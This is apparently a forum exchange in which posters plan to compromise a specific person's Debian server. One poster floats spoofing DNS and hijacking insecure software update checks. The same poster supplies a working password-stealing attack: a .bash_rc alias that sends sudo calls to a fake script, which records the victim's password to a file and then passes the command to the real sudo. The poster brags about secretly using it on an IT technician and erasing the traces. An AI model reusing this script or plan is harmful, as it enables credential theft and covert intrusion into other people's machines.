What's to stop the hacker from spoofing the DNS record for tormail, SR, etc and sending your to another server.
This is exactly what I was going to do if he gave us (or I managed to get) access to his server. He's using Linux so this doesn't apply, but some commonly installed Windows applications check for updates without forcing the use of https. It isn't too hard to trick the software into running your own "update" which would give you pretty much unrestricted access to do whatever you like on the victims machine.
I've done things like that in the past, but as you say he's using linux (debian, so nmap says) so it's package manager will check the signature of all packages.
Here's something else which I was intending to do:
If he's using bash, then create an alias within .bash_rc, and link sudo calls to a simple password capturing script.
e.g.
within .bash_rc:
alias sudo="passwordCapture.sh"
Now any time sudo is called (e.g. sudo apt-get update); sudo calls the following 'fake sudo' script which logs the password to a file, tells the user it is wrong, and calls the legit sudo program with the arguments originally passed.
#!/bin/bash
stty -echo
read -p "[sudo] password for $(whoami): " passw; echo
stty echo
echo $passw >> password.txt
echo "Sorry, try again."
echo "sudo $*" | sh
I done this many years ago to my old IT technician, but made the script more fancy by deleting any references once it had complete: he was none the wiser.
--
Thanks joe23, got your transfer.